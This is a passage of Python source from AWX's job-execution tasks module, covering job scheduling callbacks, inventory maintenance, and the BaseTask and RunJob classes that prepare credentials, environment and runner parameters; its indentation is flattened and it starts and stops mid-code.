new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def migrate_legacy_event_data(tblname):
#
# NOTE: this function is not actually in use anymore,
# but has been intentionally kept for historical purposes,
# and to serve as an illustration if we ever need to perform
# bulk modification/migration of event data in the future.
#
if 'event' not in tblname:
return
with advisory_lock(f'bigint_migration_{tblname}', wait=False) as acquired:
if acquired is False:
return
chunk = settings.JOB_EVENT_MIGRATION_CHUNK_SIZE
def _remaining():
try:
cursor.execute(f'SELECT MAX(id) FROM _old_{tblname};')
return cursor.fetchone()[0]
except ProgrammingError:
# the table is gone (migration is unnecessary)
return None
with connection.cursor() as cursor:
total_rows = _remaining()
while total_rows:
with transaction.atomic():
cursor.execute(f'INSERT INTO {tblname} SELECT * FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk} RETURNING id;')
last_insert_pk = cursor.fetchone()
if last_insert_pk is None:
# this means that the SELECT from the old table was
# empty, and there was nothing to insert (so we're done)
break
last_insert_pk = last_insert_pk[0]
cursor.execute(f'DELETE FROM _old_{tblname} WHERE id IN (SELECT id FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk});')
logger.warn(f'migrated int -> bigint rows to {tblname} from _old_{tblname}; # ({last_insert_pk} rows remaining)')
if _remaining() is None:
cursor.execute(f'DROP TABLE IF EXISTS _old_{tblname}')
logger.warn(f'{tblname} primary key migration to bigint has finished')
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('ascii')).decode()}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'].append(f'{this_path}:{this_path}:Z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
runner_project_folder = os.path.join(path, 'project')
if not os.path.exists(runner_project_folder):
# Ansible Runner requires that this directory exists.
# Specifically, when using process isolation
os.mkdir(runner_project_folder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=private_data_dir)
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via [email protected]
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
os.makedirs(path, mode=0o700)
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_cwd(self, instance, private_data_dir):
raise NotImplementedError
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
cwd = self.build_cwd(self.instance, private_data_dir)
res = ansible_runner.interface.run(
project_dir=cwd, event_handler=self.event_handler, finished_callback=self.finished_callback, status_handler=self.status_handler, **params
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack':
env['OS_CLIENT_CONFIG_FILE'] = os.path.join('/runner', os.path.basename(cred_files.get(cloud_cred, '')))
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
